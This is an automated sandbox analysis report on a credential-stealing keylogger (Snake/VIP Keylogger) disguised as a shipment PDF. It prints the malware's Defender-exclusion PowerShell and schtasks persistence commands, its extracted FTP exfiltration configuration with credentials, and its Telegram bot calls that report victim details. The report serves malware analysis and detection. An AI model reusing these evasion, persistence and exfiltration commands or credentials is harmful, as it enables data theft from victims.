Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipment 990847575203.pdf.exe

Overview

General Information

Sample name:Shipment 990847575203.pdf.exe
Analysis ID:1575105
MD5:8626a0c350243b5390abf5dee2a40641
SHA1:8337486fbbece35e03456500b23c5044466419c7
SHA256:d16a272916c70064157e0cef6770ff47ed874369e4db36ae0a569dd85357efca
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Shipment 990847575203.pdf.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe" MD5: 8626A0C350243B5390ABF5DEE2A40641)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7384 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • FZcXKpA.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\FZcXKpA.exe MD5: 8626A0C350243B5390ABF5DEE2A40641)
    • schtasks.exe (PID: 7644 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Shipment 990847575203.pdf.exe.430d590.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Shipment 990847575203.pdf.exe.430d590.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.Shipment 990847575203.pdf.exe.430d590.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.Shipment 990847575203.pdf.exe.430d590.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2c1df:$a1: get_encryptedPassword
                  • 0x2c4fc:$a2: get_encryptedUsername
                  • 0x2bfef:$a3: get_timePasswordChanged
                  • 0x2c0f8:$a4: get_passwordField
                  • 0x2c1f5:$a5: set_encryptedPassword
                  • 0x2d8ce:$a7: get_logins
                  • 0x2d831:$a10: KeyLoggerEventArgs
                  • 0x2d496:$a11: KeyLoggerEventArgsEventHandler
                  0.2.Shipment 990847575203.pdf.exe.430d590.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x39fe6:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x39689:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x398e6:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x3a2c5:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 24 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Suspicious Double Extension File Execution
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, NewProcessName: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 5192, ProcessName: Shipment 990847575203.pdf.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 2656, ProcessName: powershell.exe
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49719
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 2656, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FZcXKpA.exe, ParentImage: C:\Users\user\AppData\Roaming\FZcXKpA.exe, ParentProcessId: 7360, ParentProcessName: FZcXKpA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", ProcessId: 7644, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", ProcessId: 5692, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 2656, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", ProcessId: 5692, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T13:49:42.279808+010028033053Unknown Traffic192.168.2.649722172.67.177.134443TCP
                  2024-12-14T13:49:45.721882+010028033053Unknown Traffic192.168.2.649726172.67.177.134443TCP
                  2024-12-14T13:49:48.779919+010028033053Unknown Traffic192.168.2.649730172.67.177.134443TCP
                  2024-12-14T13:49:53.407497+010028033053Unknown Traffic192.168.2.649736172.67.177.134443TCP
                  2024-12-14T13:49:54.941404+010028033053Unknown Traffic192.168.2.649739172.67.177.134443TCP
                  2024-12-14T13:49:56.684295+010028033053Unknown Traffic192.168.2.649742172.67.177.134443TCP
                  2024-12-14T13:49:59.996584+010028033053Unknown Traffic192.168.2.649747172.67.177.134443TCP
                  2024-12-14T13:50:10.797902+010028033053Unknown Traffic192.168.2.649754172.67.177.134443TCP
                  2024-12-14T13:50:30.404732+010028033053Unknown Traffic192.168.2.649767172.67.177.134443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T13:49:38.000947+010028032742Potentially Bad Traffic192.168.2.649719158.101.44.24280TCP
                  2024-12-14T13:49:40.659005+010028032742Potentially Bad Traffic192.168.2.649719158.101.44.24280TCP
                  2024-12-14T13:49:44.110337+010028032742Potentially Bad Traffic192.168.2.649724193.122.6.16880TCP
                  2024-12-14T13:49:49.672852+010028032742Potentially Bad Traffic192.168.2.649731193.122.6.16880TCP
                  2024-12-14T13:49:51.782215+010028032742Potentially Bad Traffic192.168.2.649731193.122.6.16880TCP
                  2024-12-14T13:49:55.032239+010028032742Potentially Bad Traffic192.168.2.649740193.122.6.16880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeReversingLabs: Detection: 65%
                  Multi AV Scanner detection for submitted file
                  Source: Shipment 990847575203.pdf.exeReversingLabs: Detection: 65%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Shipment 990847575203.pdf.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Shipment 990847575203.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49720 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49768 version: TLS 1.2
                  Source: Shipment 990847575203.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00CBF45Dh9_2_00CBF2CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00CBF45Dh9_2_00CBF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00CBFC19h9_2_00CBF974
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02EBF45Dh17_2_02EBF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02EBF45Dh17_2_02EBF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02EBFC19h17_2_02EBF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABE501h17_2_06ABE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06AB0D0Dh17_2_06AB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06AB1697h17_2_06AB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06AB31E0h17_2_06AB2DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06AB2C19h17_2_06AB2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABE959h17_2_06ABE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABE0A9h17_2_06ABDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABF661h17_2_06ABF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABEDB1h17_2_06ABEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABF209h17_2_06ABEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABCF49h17_2_06ABCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABD3A1h17_2_06ABD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABFAB9h17_2_06ABF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h17_2_06AB0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABDC51h17_2_06ABD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06AB31E0h17_2_06AB310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06ABD7F9h17_2_06ABD550

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49719 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49740 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49739 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49730 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49767 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49754 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 172.67.177.134:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
